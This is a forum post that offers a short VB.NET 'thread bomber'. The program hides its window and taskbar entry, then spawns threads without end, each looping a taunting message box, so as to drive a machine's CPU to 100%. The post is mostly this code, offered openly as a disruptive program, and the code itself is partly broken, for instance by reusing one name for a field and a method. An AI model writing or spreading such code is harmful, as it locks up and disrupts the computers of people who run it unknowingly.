• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

.NET Thread Bomber[100% CPU] example

Status
Not open for further replies.

Nax

Leech
User
Joined
Oct 18, 2011
Messages
275
Reputation
0
Reaction score
115
Points
43
Credits
0
‎13 Years of Service‎
92%
Thread Bomber[100% CPU]

Code:
>Public Randomz As Random
(Frm1_Load Sub Etc...Here)
Visible = False
ShowInTaskbar = False
Name = Randomz.Next(100000)
Do
Dim Threadzy as thread
Threadzy = New Thread(AddressOf Me.Randomz)
Threadzy.Start()
Loop
End Sub

Sub Randomz
Do
MsgBox("I Strike Again, Death To The Republic!", "NExTliFE")
Loop
End Sub
 
Status
Not open for further replies.
Back
Top